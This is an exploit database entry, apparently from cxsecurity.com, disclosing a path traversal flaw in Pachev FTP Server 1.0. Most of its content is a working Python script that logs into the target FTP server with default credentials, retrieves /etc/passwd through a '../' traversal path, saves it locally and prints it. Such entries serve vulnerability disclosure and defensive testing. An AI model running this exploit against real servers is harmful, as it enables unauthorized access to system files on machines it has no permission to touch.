Pachev FTP Server 1.0 Path Traversal

2020.01.23
Credit: 1F98D
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-22

# Exploit Title: Pachev FTP Server 1.0 - Path Traversal # Date: 2020-01-23 # Vulnerability: Path Traversal # Exploit Author: 1F98D # Vendor Homepage: https://github.com/pachev/pachev_ftp from ftplib import FTP ip = raw_input("Target IP: ") port = int(raw_input("Target Port: ")) ftp = FTP() ftp.connect(host=ip, port=port) ftp.login('pachev', '') ftp.retrbinary('RETR ../../../../../../../../etc/passwd', open('passwd.txt', 'wb').write) ftp.close() file = open('passwd.txt', 'r') print "[**] Printing the contents of /etc/passwd\n" print file.read()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top